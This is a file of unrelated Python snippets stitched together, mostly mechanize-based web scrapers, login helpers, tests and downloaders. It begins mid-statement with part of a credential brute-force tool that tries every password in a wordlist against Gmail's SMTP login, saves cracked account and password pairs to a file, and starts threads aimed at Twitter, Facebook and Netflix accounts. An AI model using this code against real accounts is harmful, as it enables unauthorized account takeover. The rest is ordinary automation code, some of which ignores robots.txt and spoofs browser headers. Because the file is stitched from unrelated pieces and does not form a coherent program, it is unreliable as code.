format(password, options.hotmail)) if options.twitter != None: hejab = threading.Thread(target=twitter, name="hejab") hejab.start() if options.facebook != None: facebook(brows) if options.netflix != None: netflix = threading.Thread(target=Netflix, name="Netflix") netflix.start() elif options.gmail != None or options.hotmail == None or options.twitter == None: smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587) smtp_srverG.ehlo() smtp_srverG.starttls() if options.password != None or options.list_password == None: print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s" % (R, W)) try: smtp_srverG.login(options.gmail, options.password) print("Found Password :{} \t Found Gmail:{}".format( options.password, options.gmail)) Save = io.open("Gmail.txt", "a").write("Account Gmail:" + options.gmail + "\t\tPassword:"******"\n") except: print("Not Found Password : {} \t Email Gmail:{}".format( options.password, options.gmail)) elif options.list_password != None: password_list = io.open(options.list_password, "r").readlines() for password in password_list: password = password.rstrip("\n") print("<<<<<<+++++Start Attacking Email+++++>>>>>") try: smtp_srverG.login(options.gmail, password) print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>". format(G, password, options.gmail)) Save = io.open("Gmail.txt", "a").write("Account Gmail:" + options.gmail + "\t\tPassword:"******"\n") break except smtplib.SMTPAuthenticationError: print( "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>" .format(R, password, options.gmail)) else: print(use.usage) exit()
def __init__(self, *args, **kwargs):
    self._clone_actions = {}
    B.__init__(self, *args, **kwargs)
    self.set_cookiejar(CookieJar())
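# Hypothetical sketch, not present in the original source: the _clone_actions
# dict recorded by the setters above suggests a clone() helper that replays
# every recorded configuration call on a fresh instance. A minimal version
# might look like this (method name and placement are assumptions):
def clone(self):
    new = self.__class__()
    for method_name, args, kwargs in self._clone_actions.values():
        getattr(new, method_name)(*args, **kwargs)
    return new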
def getSolutions(path_prefix, path_proxy):
    global br, username, password

    # create a browser object
    br = Browser()

    # add proxy support to browser
    if len(path_proxy) != 0:
        protocol, proxy = options.proxy.split("://")
        br.set_proxies({protocol: proxy})

    # let browser fool robots.txt
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; \
        rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.set_handle_robots(False)

    print "Enter your SPOJ username :"******"Authenticating " + username
    br.open("http://spoj.com/")
    for form in br.forms():
        if form.attrs['id'] == 'login-form':
            br.form = form
            break
    br["login_user"] = username
    br["password"] = password

    # sign in for a day to avoid timeouts
    br.find_control(name="autologin").selected = True
    br.form.action = "http://www.spoj.com"
    response = br.submit()

    verify = response.read()
    if (verify.find("Authentication failed!") != -1):
        print "Error authenticating - " + username
        exit(0)

    # grab the signed submissions list
    print "Grabbing siglist for " + username
    siglist = br.open("http://www.spoj.com/status/" + username + "/signedlist")

    # dump first nine useless lines in signed list for formatting
    for i in xrange(9):
        siglist.readline()

    # make a list of all AC's and challenges
    print "Filtering siglist for AC/Challenge solutions..."
    mysublist = list()

    while True:
        temp = siglist.readline()
        if temp == '\------------------------------------------------------------------------------/\n':
            # reached end of siglist
            break
        if not len(temp):
            print "Reached EOF, siglist format has probably changed," + \
                  " contact author."
            exit(1)
        entry = [x.strip() for x in temp.split('|')]
        if entry[4] == 'AC' or entry[4].isdigit():
            mysublist.append(entry)

    print "Done !!!"
    return mysublist
#From http://palewi.re/posts/2008/04/20/python-recipe-grab-a-page-scrape-a-table-download-a-file/
#!/usr/bin/env python
import scraperwiki
from mechanize import Browser
from BeautifulSoup import BeautifulSoup

def extract(soup, year):
    #print soup
    #print year
    tables = soup.findChildren('table')
    table = tables[4]
    for row in table.findAll('tr'):
        h3 = row.findAll('h3')
        name = h3[0].string
        print name
        td = row.findAll('td')
        role = td[2].string
        print role
        #cover_link = col[3].img['src']
        record = (str(year), name, role)
        print "|".join(record)

mech = Browser()
url = "http://europa.eu/whoiswho/public/index.cfm?fuseaction=idea.hierarchy&nodeID=370629&personID=150128&lang=en"
page1 = mech.open(url)
html1 = page1.read()
soup1 = BeautifulSoup(html1)
extract(soup1, 2007)
#page2 = mech.follow_link(text_regex="Next")
#html2 = page2.read()
#soup2 = BeautifulSoup(html2)
#extract(soup2, 2006)
def test_select_records_per_group(self): """webuser - test of user preferences setting""" # logging in as admin browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Going to edit page and setting records per group to 20 browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit/WebSearchSettings") browser.select_form(nr=0) browser['rg'] = ["25"] browser.submit() expected_response = "Data has been saved." changed_settings_body = browser.response().read() try: changed_settings_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, changed_settings_body)) # Going to the search page, making an empty search browser.open(CFG_SITE_SECURE_URL) browser.select_form(name="search") browser.submit() expected_response = "1 to 25" records_found_body = browser.response().read() try: records_found_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, records_found_body)) # Going again to edit and setting records per group back to 10 browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit/WebSearchSettings") browser.select_form(name="edit") browser['rg'] = ["10"] browser.submit() expected_response = "Data has been saved." changed_settings_body = browser.response().read() try: changed_settings_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, changed_settings_body)) # Logging out! browser.open(CFG_SITE_SECURE_URL + "/youraccount/logout") expected_response = "You are no longer recognized" logout_response_body = browser.response().read() try: logout_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, logout_response_body)) # Logging in again browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Let's go to search and check that the setting is still there browser.open(CFG_SITE_SECURE_URL) browser.select_form(name="search") browser.submit() expected_response = "1 to 10" records_found_body = browser.response().read() try: records_found_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, records_found_body)) return
class Lime(Torrent): def __init__(self, otherFilters, minSize, debug): self._urlBase = "https://www.limetorrents.cc" self._urlSearch = u"https://www.limetorrents.cc/search/all/{name} {episode}" self._languageDict = {"english": 2, "spanish": 14} #To MB self._minSize = int(minSize) / 1048576 self._debug = debug extraFilters = u"{otherFilters}" if otherFilters != "": self._otherFilers = u" " + otherFilters else: self._otherFilers = "" self._urlSearch = ''.join([ self._urlSearch, extraFilters.format(otherFilters=self._otherFilers), '/seeds/1/' ]) self._browser = Browser() self._browser.set_handle_robots(False) self._cookieJar = cookielib.LWPCookieJar() self._browser.set_cookiejar(self._cookieJar) self._browser.addheaders = [( 'User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' ), ('Accept', '*/*'), ('Accept-Encoding', "gzip,deflate")] self._browser.open(self._urlBase) def episodeSearch(self, serie, episode): searchQuery = self._urlSearch.format( name=serie, episode=episode["number"]).replace(" ", "-") logging.debug(u"searchURL: {}".format(searchQuery)) try: self._browser.open(searchQuery) gzipContent = self._browser.response().read() html = gzip.GzipFile(fileobj=StringIO.StringIO(gzipContent)).read() #Scrapping the page. soup = BeautifulSoup(html) if (soup.body.findAll(text='No results found')): logging.error( u"There wasn't results for: {}".format(searchQuery)) return None items = soup.findAll('table', {"class": "table2"})[1].findAll('tr') #We skip the first tr because is the header. (no tbody in html). for item in items[1:]: #print item #print item.findAll("td" ,{"class": "tdnormal"}) contentLength = item.findAll( "td", {"class": "tdnormal"})[1].text.split(' ') if contentLength[1][:2] != 'GB' and float( contentLength[0]) < self._minSize: logging.warning(u"Torrent to small: {}".format(' '.join( [contentLength[0], contentLength[1][:2]]))) continue linkA = item.find("div", {"class": "tt-name"}).findAll("a")[1] infoUrl = linkA['href'] name = linkA.text logging.info(u"Going to download: {}".format(name)) logging.info(u"File size: {}".format(' '.join( [contentLength[0], contentLength[1][:2]]))) self._browser.open(''.join([self._urlBase, infoUrl])) gzipContent = self._browser.response().read() html = gzip.GzipFile( fileobj=StringIO.StringIO(gzipContent)).read() soup2 = BeautifulSoup(html) #TODO: posibleLinks = soup2.findAll('div', {'class': 'downloadarea'}) for link in posibleLinks: href = link.find('a')['href'] if href[0:7] == 'magnet:': return href break return None except HTTPError, e: logging.error( u"There was an error in the URL {}.".format(searchQuery)) return None
from BeautifulSoup import BeautifulSoup, SoupStrainer
import sys
print sys.stdout.encoding
import re
from mechanize import Browser

f = open("ips2", "r")

br = Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent',
                  'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

for line in f:
    url = "http://www.geoiptool.com/es/?IP=" + line
    print url
    response = br.open(url)
    data = response.read()
    for item in data.split("\n"):
        if "flag" in item and "class" in item:
            print item
def test_password_setting(self): """webuser - check password settings""" browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Going to set new password from "" to "123" browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "" browser['password'] = "******" browser['password2'] = "123" browser.submit() expected_response = "Password successfully edited" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Going to set a wrong old password browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "******" browser['password2'] = "123" browser.submit() expected_response = "Wrong old password inserted" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Going to put different new passwords browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "******" browser['password2'] = "321" browser.submit() expected_response = "Both passwords must match" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Reset the situation browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "" browser['password2'] = "" browser.submit() expected_response = "Password successfully edited" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body))
def on_task_start(self, task, config): try: from mechanize import Browser except ImportError: raise PluginError('mechanize required (python module), please install it.', log) userfield = config.get('userfield', 'username') passfield = config.get('passfield', 'password') url = config['url'] username = config['username'] password = config['password'] br = Browser() br.set_handle_robots(False) try: br.open(url) except Exception as e: # TODO: improve error handling raise PluginError('Unable to post login form', log) #br.set_debug_redirects(True) #br.set_debug_responses(True) #br.set_debug_http(True) for form in br.forms(): loginform = form try: loginform[userfield] = username loginform[passfield] = password break except Exception as e: pass else: received = os.path.join(task.manager.config_base, 'received') if not os.path.isdir(received): os.mkdir(received) filename = os.path.join(received, '%s.formlogin.html' % task.name) f = open(filename, 'w') f.write(br.response().get_data()) f.close() log.critical('I have saved the login page content to %s for you to view' % filename) raise PluginError('Unable to find login fields', log) br.form = loginform br.submit() cookiejar = br._ua_handlers["_cookies"].cookiejar # Add cookiejar to our requests session task.requests.add_cookiejar(cookiejar) # Add handler to urllib2 default opener for backwards compatibility handler = urllib2.HTTPCookieProcessor(cookiejar) if urllib2._opener: log.debug('Adding HTTPCookieProcessor to default opener') urllib2._opener.add_handler(handler) else: log.debug('Creating new opener and installing it') urllib2.install_opener(urllib2.build_opener(handler))
def test_email_caseless(self): """webuser - check email caseless""" browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Account created" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar2' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Registration failure" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar2' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Registration failure" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body))
class CourseraDownloader(object): """ Class to download content (videos, lecture notes, ...) from coursera.org for use offline. https://github.com/dgorissen/coursera-dl """ BASE_URL = 'http://class.coursera.org/%s' HOME_URL = BASE_URL + '/class/index' LECTURE_URL = BASE_URL + '/lecture/index' LOGIN_URL = BASE_URL + '/auth/auth_redirector?type=login&subtype=normal' QUIZ_URL = BASE_URL + '/quiz/index' DEFAULT_PARSER = "lxml" def __init__(self,username,password,parser=DEFAULT_PARSER): """Requires your coursera username and password. You can also specify the parser to use (defaults to lxml), see http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser """ self.username = username self.password = password self.parser = parser self.browser = Browser() self.browser.set_handle_robots(False) def login(self,course_name): print "* Authenticating as %s..." % self.username # open the course login page page = self.browser.open(self.LOGIN_URL % course_name) # check if we are already logged in by checking for a password field bs = BeautifulSoup(page,self.parser) pwdfield = bs.findAll("input",{"id":"password_login"}) if pwdfield: self.browser.form = self.browser.forms().next() self.browser['email'] = self.username self.browser['password'] = self.password r = self.browser.submit() # check that authentication actually succeeded bs2 = BeautifulSoup(r.read(),self.parser) title = bs2.title.string if title.find("Login Failed") > 0: raise Exception("Failed to authenticate as %s" % (self.username,)) else: # no login form, already logged in print "* Already logged in" def course_name_from_url(self,course_url): """Given the course URL, return the name, e.g., algo2012-p2""" return course_url.split('/')[3] def lecture_url_from_name(self,course_name): """Given the name of a course, return the video lecture url""" return self.LECTURE_URL % course_name def get_downloadable_content(self,course_url): """Given the video lecture URL of the course, return a list of all downloadable resources.""" cname = self.course_name_from_url(course_url) print "* Collecting downloadable content from " + course_url # get the course name, and redirect to the course lecture page vidpage = self.browser.open(course_url) # extract the weekly classes soup = BeautifulSoup(vidpage,self.parser) headers = soup.findAll("h3", { "class" : "list_header" }) weeklyTopics = [] allClasses = {} # for each weekly class for header in headers: ul = header.findNext('ul') sanitisedHeaderName = sanitiseFileName(header.text) weeklyTopics.append(sanitisedHeaderName) lis = ul.findAll('li') weekClasses = {} # for each lecture in a weekly class classNames = [] for li in lis: className = sanitiseFileName(li.a.text) classNames.append(className) classResources = li.find('div', {'class': 'item_resource'}) hrefs = classResources.findAll('a') # for each resource of that lecture (slides, pdf, ...) 
# (dont set a filename here, that will be inferred from the headers) resourceLinks = [ (h['href'],None) for h in hrefs] # check if the video is included in the resources, if not, try # do download it directly hasvid = [x for x,_ in resourceLinks if x.find('.mp4') > 0] if not hasvid: ll = li.find('a',{'class':'lecture-link'}) lurl = ll['data-lecture-view-link'] p = self.browser.open(lurl) bb = BeautifulSoup(p,self.parser) vobj = bb.find('source',type="video/mp4") if not vobj: print " Warning: Failed to find video for %s" % className else: vurl = vobj['src'] # build the matching filename fn = className + ".mp4" resourceLinks.append( (vurl,fn) ) weekClasses[className] = resourceLinks # keep track of the list of classNames in the order they appear in the html weekClasses['classNames'] = classNames allClasses[sanitisedHeaderName] = weekClasses return (weeklyTopics, allClasses) def download(self, url, target_dir=".", target_fname=None): """Download the url to the given filename""" r = self.browser.open(url) # get the headers headers = r.info() # get the content length (if present) clen = int(headers['Content-Length']) if 'Content-Length' in headers else -1 # build the absolute path we are going to write to fname = target_fname or sanitiseFileName(CourseraDownloader.getFileName(headers)) or CourseraDownloader.getFileNameFromURL(url) filepath = os.path.join(target_dir,fname) dl = True if os.path.exists(filepath): if clen > 0: fs = os.path.getsize(filepath) delta = clen - fs # all we know is that the current filesize may be shorter than it should be and the content length may be incorrect # overwrite the file if the reported content length is bigger than what we have already by at least k bytes (arbitrary) # TODO this is still not foolproof as the fundamental problem is that the content length cannot be trusted # so this really needs to be avoided and replaced by something else, eg., explicitly storing what downloaded correctly if delta > 2: print ' - "%s" seems incomplete, downloading again' % fname else: print ' - "%s" already exists, skipping' % fname dl = False else: # missing or invalid content length # assume all is ok... dl = False try: if dl: self.browser.retrieve(url,filepath) except Exception as e: print "Failed to download url %s to %s: %s" % (url,filepath,e) def download_course(self,cname,dest_dir="."): """Download all the contents (quizzes, videos, lecture notes, ...) 
of the course to the given destination directory (defaults to .)""" # Ensure we are logged in self.login(cname) # get the lecture url course_url = self.lecture_url_from_name(cname) (weeklyTopics, allClasses) = self.get_downloadable_content(course_url) print '* Got all downloadable content for ' + cname course_dir = os.path.abspath(os.path.join(dest_dir,cname)) # ensure the target dir exists if not os.path.exists(course_dir): os.mkdir(course_dir) print "* " + cname + " will be downloaded to " + course_dir # ensure the course directory exists if not os.path.exists(course_dir): os.makedirs(course_dir) # download the standard pages print " - Downloading lecture/syllabus pages" self.download(self.HOME_URL % cname,target_dir=course_dir,target_fname="index.html") self.download(course_url,target_dir=course_dir,target_fname="lectures.html") # commented out because of https://github.com/dgorissen/coursera-dl/issues/2 # self.download((self.BASE_URL + '/wiki/view?page=syllabus') % cname, target_dir=course_dir,target_fname="syllabus.html") # download the quizzes & homeworks #for qt in ['quiz','homework']: # print " - Downloading the '%s' quizzes" % qt # try: # self.download_quizzes(cname,course_dir,quiz_type=qt) # except Exception as e: # print " - Failed %s" % e # now download the actual content (video's, lecture notes, ...) for j,weeklyTopic in enumerate(weeklyTopics,start=1): if weeklyTopic not in allClasses: #print 'Weekly topic not in all classes:', weeklyTopic continue # ensure the week dir exists # add a numeric prefix to the week directory name to ensure chronological ordering wkdirname = str(j).zfill(2) + " - " + weeklyTopic wkdir = os.path.join(course_dir,wkdirname) if not os.path.exists(wkdir): os.makedirs(wkdir) weekClasses = allClasses[weeklyTopic] classNames = weekClasses['classNames'] print " - " + weeklyTopic for i,className in enumerate(classNames,start=1): if className not in weekClasses: continue classResources = weekClasses[className] # ensure the class dir exists clsdirname = str(i).zfill(2) + " - " + className clsdir = os.path.join(wkdir,clsdirname) if not os.path.exists(clsdir): os.makedirs(clsdir) print " - Downloading resources for " + className for classResource,tfname in classResources: if not isValidURL(classResource): absoluteURLGen = AbsoluteURLGen(course_url) classResource = absoluteURLGen.get_absolute(classResource) print " -" + classResource, ' - is not a valid url' if not isValidURL(classResource): print " -" + classResource, ' - is not a valid url' continue try: #print ' - Downloading ', classResource self.download(classResource,target_dir=clsdir,target_fname=tfname) except Exception as e: print " - failed: ",classResource,e def download_quizzes(self,course,target_dir,quiz_type="quiz"): """Download each of the quizzes as separate html files, the quiz type is typically quiz or homework""" # extract the list of all quizzes qurl = (self.QUIZ_URL + "?quiz_type=" + quiz_type) % course p = self.browser.open(qurl) bs = BeautifulSoup(p,self.parser) qlist = bs.find('div',{'class':'item_list'}) qurls = [q['href'].replace('/start?','/attempt?') for q in qlist.findAll('a',{'class':'btn primary'})] titles = [t.string for t in qlist.findAll('h4')] # ensure the target directory exists dir = os.path.join(target_dir,quiz_type) try: os.makedirs(dir) except OSError as e: if e.errno == errno.EEXIST: pass else: raise # download each one for i,it in enumerate(zip(qurls,titles),start=1): q,t = it fname = os.path.join(dir,str(i).zfill(2) + " - " + sanitiseFileName(t) + ".html") if 
os.path.exists(fname): pass #print " - already exists, skipping" else: self.browser.retrieve(q,fname) @staticmethod def extractFileName(contentDispositionString): #print contentDispositionString pattern = 'attachment; filename="(.*?)"' m = re.search(pattern, contentDispositionString) try: return m.group(1) except Exception: return '' @staticmethod def getFileName(header): try: return CourseraDownloader.extractFileName(header['Content-Disposition']).lstrip() except Exception: return '' @staticmethod def getFileNameFromURL(url): splits = url.split('/') splits.reverse() splits = urllib.unquote(splits[0]) #Seeing slash in the unquoted fragment splits = splits.split('/') fname = splits[len(splits) - 1] # add an extension if none ext = os.path.splitext(fname)[1] if not ext: fname += ".html" return fname
import mechanize
from mechanize import Browser
from bs4 import BeautifulSoup as BS
import json

br = Browser()

# Browser options
# Ignore robots.txt. Do not do this without thought and consideration.
br.set_handle_robots(False)
# Don't add Referer (sic) header
br.set_handle_referer(False)
# Follow refresh 0 but don't hang on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)

# Setting the user agent
br.addheaders = [(
    'User-agent',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
)]

br.open('https://www.linkedin.com/in/shashankgaurav')

# Getting the response in beautifulsoup
soup = BS(br.response().read(), 'lxml')
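# A minimal follow-up sketch (not part of the original snippet): once the page
# is parsed, data is pulled out of the soup as usual -- e.g. the <title> tag.
# The json import above is reused here only for pretty-printing.
page_title = soup.title.string if soup.title else None
print(json.dumps({'title': page_title}))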